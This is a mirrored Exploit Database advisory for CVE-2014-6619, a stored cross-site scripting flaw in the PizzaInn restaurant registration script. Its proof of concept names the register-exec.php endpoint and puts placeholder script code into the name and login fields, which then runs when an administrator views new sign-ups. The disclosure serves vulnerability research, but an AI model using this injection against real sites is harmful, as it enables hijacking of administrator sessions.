Restaurant Script (PizzaInn Project) – Persistent Cross-Site Scripting

• Exploit Database
• 9 阅读

• 作者： Kenneth F. Belva
  日期： 2014-09-24
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/34760/

• Title: Pizza Inn Registration Stored XSS
  Severity: High
  CVE-ID: CVE-2014-6619
  Release Date:20 September 2014 
  Author: Kenneth F. Belva
  Websites:http://silverbackventuresllc.com
  http://xssWarrior.com 
  http://securitymaverick.com
  Twitter: @infosecmaverick
  Contact:Please use website contact form.
  Mail: 
  URL: http://sourceforge.net/projects/restaurantmis/
  Vendor: 
  Remote Exploit:Yes
  
  Discovered with: xssWarrior - http://xssWarrior.com
  
  
  Description:
  ============
  
  On registration the XSS code will be stored in the database. When the administrator views the new sign-ups it will execute.
  
  
  Proof of Concept :
  ==================
  
  http://[domain]/PizzaInn/register-exec.php
  fname=[code]&lname=[code]&login=[code]&password=r00t&cpassword=r00t&question=8&answer=hack4&Submit=Register